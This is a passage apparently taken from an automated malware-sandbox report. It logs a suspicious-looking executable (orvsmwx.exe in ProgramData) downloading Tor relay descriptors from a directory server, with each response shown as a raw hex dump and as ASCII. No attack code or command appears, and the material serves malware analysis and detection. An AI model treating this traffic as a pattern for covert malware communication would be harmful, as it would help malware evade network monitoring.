6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 33 3a 31 33 3a 32 36 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 44 33 45 39 20 46 38 36 37 20 44 44 46 32 20 38 44 45 31 20 39 31 45 41 20 36 31 31 46 20 44 33 36 30 20 33 35 33 43 20 38 33 38 34 20 46 38 41 42 0a 75 70 74 69 6d 65 20 37 38 31 0a 62 61 6e 64 77 69 64 74 68 20 35 31 32 30 30 30 20 36 31 34 34 30 30 20 34 38 37 31 35 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 36 45 39 31 45 32 42 37 41 31 42 38 30 38 39 46 45 41 32 31 43 36 39 37 30 30 33 38 46 44 33 34 41 33 43 31 36 36 39 34 20 62 31 78 61 39 57 32 5a 56 46 78 6c 36 2f 65 54 73 35 2f 75 4b 58 6d 57 7a 6a 4c 41 2b 77 6e 56 42 69 64 59 31 59 38 65 4c 44 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 61 5a 6a 45 6e 47 38 78 58 4f 53 51 42 53 58 63 68 79 39 6f 48 67 4c 75 47 4e 7a 66 6b 4f 6b 48 50 35 46 70 72 4a 64 56 71 64 38 37 42 31 51 68 48 77 33 75 2f 69 0a 4f 6a 75 51 73 2f 4b 69 41 30 51 34 2f 47 2b 67 57 75 69 43 33 78 68 6d 43 2b 6a 69 69 68 50 64 54 70 56 34 64 45 58 4d 63 66 73 78 6c 32 2f 6d 72 2b 6b 67 48 32 53 56 54 37 30 69 74 79 77 32 0a 62 4f 69 4e 57 41 2b 6d 7a 71 7a 76 47 6f 37 38 49 31 45 56 44 50 69 47 7a 42 75 46 47 78 4b 55 50 6e 49 73 74 6d 79 72 62 74 36 6a 57 5a 79 4a 7a 39 4e 42 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 2f 67 7a 73 74 58 70 55 61 41 4c 68 6a 51 77 6d 77 48 71 4a
                          Data Ascii: router transtbb 84.155.152.82 14074 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxV6AQFVLbRbCeZ604P2tD8pIBGQNrOtjXuIZMasp0fB/c6QAQAgBABo560RR9EGj3UAYvjPvduapVWIOEW1OoPjpEGKO6AZpydJVYo/2124yMtbXNCthtdwqJ6tgsvpVrtpeOVMmlO4RUXBZZvPI9hXFNRwge87hzCcAcBmQtphX60ZYTf3UQk=-----END ED25519 CERT-----master-key-ed25519 aOetEUfRBo91AGL4z73bmqVViDhFtTqD46RBijugGacplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 03:13:26fingerprint D3E9 F867 DDF2 8DE1 91EA 611F D360 353C 8384 F8ABuptime 781bandwidth 512000 614400 487150extra-info-digest 6E91E2B7A1B8089FEA21C6970038FD34A3C16694 b1xa9W2ZVFxl6/eTs5/uKXmWzjLA+wnVBidY1Y8eLDMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANaZjEnG8xXOSQBSXchy9oHgLuGNzfkOkHP5FprJdVqd87B1QhHw3u/iOjuQs/KiA0Q4/G+gWuiC3xhmC+jiihPdTpV4dEXMcfsxl2/mr+kgH2SVT70ityw2bOiNWA+mzqzvGo78I1EVDPiGzBuFGxKUPnIstmyrbt6jWZyJz9NBAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL/gzstXpUaALhjQwmwHqJ


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          21192.168.2.34972277.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:00.351145983 CET5238OUTGET /tor/server/fp/5d5ddff29b96cc566aa746636868eb07f97de60c HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:00.401354074 CET5239INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:00 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:00 GMT
                          Data Raw: 72 6f 75 74 65 72 20 48 79 64 72 61 34 33 20 31 30 37 2e 31 38 39 2e 33 30 2e 32 32 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 62 35 41 56 66 72 2f 6a 61 61 44 69 37 62 4b 4a 42 74 51 4c 51 44 63 4f 70 61 39 7a 41 48 46 53 5a 6e 30 70 72 4b 47 6c 72 43 6c 33 49 66 41 51 41 67 42 41 43 50 49 57 6b 64 0a 4d 65 6a 41 5a 6d 6e 6e 71 30 2f 46 4d 2b 30 6e 6c 43 6a 5a 42 73 6c 4e 5a 61 55 65 63 6e 62 53 57 66 57 49 32 4b 5a 71 42 54 73 76 30 74 67 42 4e 36 62 4b 39 55 2f 4f 53 64 51 4f 79 50 4c 38 0a 6a 35 41 67 47 44 36 32 36 2f 74 4b 35 33 71 64 70 2b 37 6c 77 52 61 52 61 30 75 34 4f 77 77 37 77 49 4d 4d 5a 38 68 48 72 55 36 4f 31 79 4b 6b 78 55 79 32 6b 6c 6c 32 2b 41 30 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 6a 79 46 70 48 54 48 6f 77 47 5a 70 35 36 74 50 78 54 50 74 4a 35 51 6f 32 51 62 4a 54 57 57 6c 48 6e 4a 32 30 6c 6e 31 69 4e 67 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 39 3a 31 33 3a 33 34 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 35 44 35 44 20 44 46 46 32 20 39 42 39 36 20 43 43 35 36 20 36 41 41 37 20 34 36 36 33 20 36 38 36 38 20 45 42 30 37 20 46 39 37 44 20 45 36 30 43 0a 75 70 74 69 6d 65 20 31 37 32 38 32 34 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 32 31 31 33 37 30 37 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 41 32 44 41 37 33 38 39 45 31 39 35 33 42 32 32 38 44 34 30 45 44 43 38 33 31 35 46 36 31 36 39 42 37 31 31 46 46 45 46 20 50 38 51 72 70 32 72 67 71 6f 4b 59 48 30 73 46 73 65 4a 70 4f 58 61 77 64 4e 34 59 6c 79 50 78 2b 63 70 51 34 5a 6e 37 50 4d 30 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 54 44 76 39 6a 55 4a 57 46 32 4a 4f 34 35 51 33 77 76 35 6c 57 62 74 47 6c 53 4d 70 51 46 36 70 59 32 38 4b 50 66 65 77 64 63 6b 5a 66 32 75 74 68 72 2f 65 32 4f 0a 41 7a 44 75 42 2b 35 52 62 6d 58 42 37 68 72 55 75 44 62 4e 6e 42 7a 46 78 50 4f 73 61 78 78 51 6e 4b 34 34 31 68 42 6d 71 57 48 4a 36 33 64 58 6a 6b 45 74 6a 47 72 4a 59 66 4d 59 6d 35 78 6d 0a 41 56 35 62 47 6f 4a 73 50 37 34 30 6c 4b 78 47 64 31 76 7a 78 6f 6d 2f 54 6d 77 73 64 4a 2f 72 6a 31 49 4a 62 55 53 33 57 58 72 4a 62 72 78 73 4d 44 6f 68 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 53 35 38 53 52 44 71 71 4e
                          Data Ascii: router Hydra43 107.189.30.22 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxb5AVfr/jaaDi7bKJBtQLQDcOpa9zAHFSZn0prKGlrCl3IfAQAgBACPIWkdMejAZmnnq0/FM+0nlCjZBslNZaUecnbSWfWI2KZqBTsv0tgBN6bK9U/OSdQOyPL8j5AgGD626/tK53qdp+7lwRaRa0u4Oww7wIMMZ8hHrU6O1yKkxUy2kll2+A0=-----END ED25519 CERT-----master-key-ed25519 jyFpHTHowGZp56tPxTPtJ5Qo2QbJTWWlHnJ20ln1iNgplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 19:13:34fingerprint 5D5D DFF2 9B96 CC56 6AA7 4663 6868 EB07 F97D E60Cuptime 172824bandwidth 1073741824 1073741824 21137070extra-info-digest A2DA7389E1953B228D40EDC8315F6169B711FFEF P8Qrp2rgqoKYH0sFseJpOXawdN4YlyPx+cpQ4Zn7PM0onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMTDv9jUJWF2JO45Q3wv5lWbtGlSMpQF6pY28KPfewdckZf2uthr/e2OAzDuB+5RbmXB7hrUuDbNnBzFxPOsaxxQnK441hBmqWHJ63dXjkEtjGrJYfMYm5xmAV5bGoJsP740lKxGd1vzxom/TmwsdJ/rj1IJbUS3WXrJbrxsMDohAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKS58SRDqqN


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          22192.168.2.34972377.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:00.804162979 CET5249OUTGET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:00.850861073 CET5250INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:00 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:00 GMT
                          Data Raw: 72 6f 75 74 65 72 20 74 72 61 6e 73 74 62 62 20 38 34 2e 31 35 35 2e 31 35 32 2e 38 32 20 31 34 30 37 34 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 56 36 41 51 46 56 4c 62 52 62 43 65 5a 36 30 34 50 32 74 44 38 70 49 42 47 51 4e 72 4f 74 6a 58 75 49 5a 4d 61 73 70 30 66 42 2f 63 36 51 41 51 41 67 42 41 42 6f 35 36 30 52 0a 52 39 45 47 6a 33 55 41 59 76 6a 50 76 64 75 61 70 56 57 49 4f 45 57 31 4f 6f 50 6a 70 45 47 4b 4f 36 41 5a 70 79 64 4a 56 59 6f 2f 32 31 32 34 79 4d 74 62 58 4e 43 74 68 74 64 77 71 4a 36 74 0a 67 73 76 70 56 72 74 70 65 4f 56 4d 6d 6c 4f 34 52 55 58 42 5a 5a 76 50 49 39 68 58 46 4e 52 77 67 65 38 37 68 7a 43 63 41 63 42 6d 51 74 70 68 58 36 30 5a 59 54 66 33 55 51 6b 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 61 4f 65 74 45 55 66 52 42 6f 39 31 41 47 4c 34 7a 37 33 62 6d 71 56 56 69 44 68 46 74 54 71 44 34 36 52 42 69 6a 75 67 47 61 63 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 33 3a 31 33 3a 32 36 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 44 33 45 39 20 46 38 36 37 20 44 44 46 32 20 38 44 45 31 20 39 31 45 41 20 36 31 31 46 20 44 33 36 30 20 33 35 33 43 20 38 33 38 34 20 46 38 41 42 0a 75 70 74 69 6d 65 20 37 38 31 0a 62 61 6e 64 77 69 64 74 68 20 35 31 32 30 30 30 20 36 31 34 34 30 30 20 34 38 37 31 35 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 36 45 39 31 45 32 42 37 41 31 42 38 30 38 39 46 45 41 32 31 43 36 39 37 30 30 33 38 46 44 33 34 41 33 43 31 36 36 39 34 20 62 31 78 61 39 57 32 5a 56 46 78 6c 36 2f 65 54 73 35 2f 75 4b 58 6d 57 7a 6a 4c 41 2b 77 6e 56 42 69 64 59 31 59 38 65 4c 44 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 61 5a 6a 45 6e 47 38 78 58 4f 53 51 42 53 58 63 68 79 39 6f 48 67 4c 75 47 4e 7a 66 6b 4f 6b 48 50 35 46 70 72 4a 64 56 71 64 38 37 42 31 51 68 48 77 33 75 2f 69 0a 4f 6a 75 51 73 2f 4b 69 41 30 51 34 2f 47 2b 67 57 75 69 43 33 78 68 6d 43 2b 6a 69 69 68 50 64 54 70 56 34 64 45 58 4d 63 66 73 78 6c 32 2f 6d 72 2b 6b 67 48 32 53 56 54 37 30 69 74 79 77 32 0a 62 4f 69 4e 57 41 2b 6d 7a 71 7a 76 47 6f 37 38 49 31 45 56 44 50 69 47 7a 42 75 46 47 78 4b 55 50 6e 49 73 74 6d 79 72 62 74 36 6a 57 5a 79 4a 7a 39 4e 42 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 2f 67 7a 73 74 58 70 55 61 41 4c 68 6a 51 77 6d 77 48 71 4a
                          Data Ascii: router transtbb 84.155.152.82 14074 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxV6AQFVLbRbCeZ604P2tD8pIBGQNrOtjXuIZMasp0fB/c6QAQAgBABo560RR9EGj3UAYvjPvduapVWIOEW1OoPjpEGKO6AZpydJVYo/2124yMtbXNCthtdwqJ6tgsvpVrtpeOVMmlO4RUXBZZvPI9hXFNRwge87hzCcAcBmQtphX60ZYTf3UQk=-----END ED25519 CERT-----master-key-ed25519 aOetEUfRBo91AGL4z73bmqVViDhFtTqD46RBijugGacplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 03:13:26fingerprint D3E9 F867 DDF2 8DE1 91EA 611F D360 353C 8384 F8ABuptime 781bandwidth 512000 614400 487150extra-info-digest 6E91E2B7A1B8089FEA21C6970038FD34A3C16694 b1xa9W2ZVFxl6/eTs5/uKXmWzjLA+wnVBidY1Y8eLDMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANaZjEnG8xXOSQBSXchy9oHgLuGNzfkOkHP5FprJdVqd87B1QhHw3u/iOjuQs/KiA0Q4/G+gWuiC3xhmC+jiihPdTpV4dEXMcfsxl2/mr+kgH2SVT70ityw2bOiNWA+mzqzvGo78I1EVDPiGzBuFGxKUPnIstmyrbt6jWZyJz9NBAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL/gzstXpUaALhjQwmwHqJ


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          23192.168.2.34972477.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:01.009470940 CET5253OUTGET /tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:01.062529087 CET5254INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:01 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:01 GMT
                          Data Raw: 72 6f 75 74 65 72 20 56 54 49 53 75 70 70 6f 72 74 31 20 38 32 2e 32 32 31 2e 31 32 38 2e 32 32 30 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 5a 63 41 65 4b 56 6f 6e 46 6a 46 34 4d 5a 61 78 51 59 7a 41 4b 78 32 61 31 6e 52 72 6c 2f 2f 50 43 62 49 41 45 71 42 63 55 76 52 49 37 31 41 51 41 67 42 41 42 45 6d 62 45 76 0a 68 78 37 44 65 35 4e 47 36 6d 54 4c 69 66 46 57 36 2b 63 53 64 59 48 76 69 51 6b 79 64 2b 56 75 76 65 6f 4e 6d 57 6a 4d 42 34 2b 33 57 34 54 4b 64 38 77 52 6f 37 32 6b 49 34 4c 76 4b 45 73 52 0a 42 6c 35 32 32 2f 66 79 4a 52 42 46 4c 64 36 49 76 79 4e 48 53 7a 38 75 4e 63 79 4b 38 62 6b 37 74 48 39 32 65 52 78 38 78 37 35 67 36 54 70 68 56 41 31 45 45 61 71 6f 51 41 63 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 52 4a 6d 78 4c 34 63 65 77 33 75 54 52 75 70 6b 79 34 6e 78 56 75 76 6e 45 6e 57 42 37 34 6b 4a 4d 6e 66 6c 62 72 33 71 44 5a 6b 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 35 3a 33 33 3a 31 32 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 38 43 41 20 32 38 44 38 20 42 39 39 38 20 30 43 43 44 20 39 41 42 38 20 33 30 44 33 20 30 30 36 42 20 42 36 39 38 20 43 45 39 39 20 42 32 30 44 0a 75 70 74 69 6d 65 20 35 31 38 34 35 32 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 34 30 33 30 34 36 37 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 34 33 33 45 43 43 39 42 34 30 37 36 46 36 31 44 45 30 42 43 37 35 37 44 44 31 39 41 44 45 36 31 35 42 30 38 33 38 30 46 20 6d 49 2f 58 7a 37 50 78 4f 37 69 39 6a 67 63 64 74 75 53 6b 67 31 51 66 4b 38 48 47 67 53 6f 43 70 72 36 2b 33 52 37 54 38 64 67 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 64 6d 52 4b 67 59 74 61 4d 46 5a 49 70 6d 44 59 53 49 67 5a 2f 72 63 35 44 62 31 53 55 65 4d 73 47 6a 79 39 63 32 56 35 5a 62 4a 36 4a 64 7a 63 5a 32 36 4f 41 79 0a 58 4f 6a 31 50 52 2b 6b 68 75 54 74 4c 61 38 4a 52 78 30 4f 42 4c 35 74 7a 57 59 42 6f 59 6d 49 38 66 76 47 57 71 6f 46 50 71 67 6b 57 6a 59 48 51 69 7a 44 61 5a 34 79 55 4b 2f 6f 4f 35 37 4a 0a 73 63 62 70 4c 6f 72 36 4f 7a 37 4c 47 6d 63 44 75 33 66 68 33 34 41 54 2f 34 59 5a 68 73 5a 58 72 33 64 4c 6e 4a 62 32 34 72 6b 49 48 31 39 51 4c 67 4f 6c 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 4c 33 2b 74
                          Data Ascii: router VTISupport1 82.221.128.220 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxZcAeKVonFjF4MZaxQYzAKx2a1nRrl//PCbIAEqBcUvRI71AQAgBABEmbEvhx7De5NG6mTLifFW6+cSdYHviQkyd+VuveoNmWjMB4+3W4TKd8wRo72kI4LvKEsRBl522/fyJRBFLd6IvyNHSz8uNcyK8bk7tH92eRx8x75g6TphVA1EEaqoQAc=-----END ED25519 CERT-----master-key-ed25519 RJmxL4cew3uTRupky4nxVuvnEnWB74kJMnflbr3qDZkplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 15:33:12fingerprint 38CA 28D8 B998 0CCD 9AB8 30D3 006B B698 CE99 B20Duptime 518452bandwidth 1073741824 1073741824 40304672extra-info-digest 433ECC9B4076F61DE0BC757DD19ADE615B08380F mI/Xz7PxO7i9jgcdtuSkg1QfK8HGgSoCpr6+3R7T8dgonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANdmRKgYtaMFZIpmDYSIgZ/rc5Db1SUeMsGjy9c2V5ZbJ6JdzcZ26OAyXOj1PR+khuTtLa8JRx0OBL5tzWYBoYmI8fvGWqoFPqgkWjYHQizDaZ4yUK/oO57JscbpLor6Oz7LGmcDu3fh34AT/4YZhsZXr3dLnJb24rkIH19QLgOlAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKL3+t


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          24192.168.2.34972577.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:01.590738058 CET5261OUTGET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:01.637325048 CET5263INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:01 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:01 GMT
                          Data Raw: 72 6f 75 74 65 72 20 74 72 61 6e 73 74 62 62 20 38 34 2e 31 35 35 2e 31 35 32 2e 38 32 20 31 34 30 37 34 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 56 36 41 51 46 56 4c 62 52 62 43 65 5a 36 30 34 50 32 74 44 38 70 49 42 47 51 4e 72 4f 74 6a 58 75 49 5a 4d 61 73 70 30 66 42 2f 63 36 51 41 51 41 67 42 41 42 6f 35 36 30 52 0a 52 39 45 47 6a 33 55 41 59 76 6a 50 76 64 75 61 70 56 57 49 4f 45 57 31 4f 6f 50 6a 70 45 47 4b 4f 36 41 5a 70 79 64 4a 56 59 6f 2f 32 31 32 34 79 4d 74 62 58 4e 43 74 68 74 64 77 71 4a 36 74 0a 67 73 76 70 56 72 74 70 65 4f 56 4d 6d 6c 4f 34 52 55 58 42 5a 5a 76 50 49 39 68 58 46 4e 52 77 67 65 38 37 68 7a 43 63 41 63 42 6d 51 74 70 68 58 36 30 5a 59 54 66 33 55 51 6b 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 61 4f 65 74 45 55 66 52 42 6f 39 31 41 47 4c 34 7a 37 33 62 6d 71 56 56 69 44 68 46 74 54 71 44 34 36 52 42 69 6a 75 67 47 61 63 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 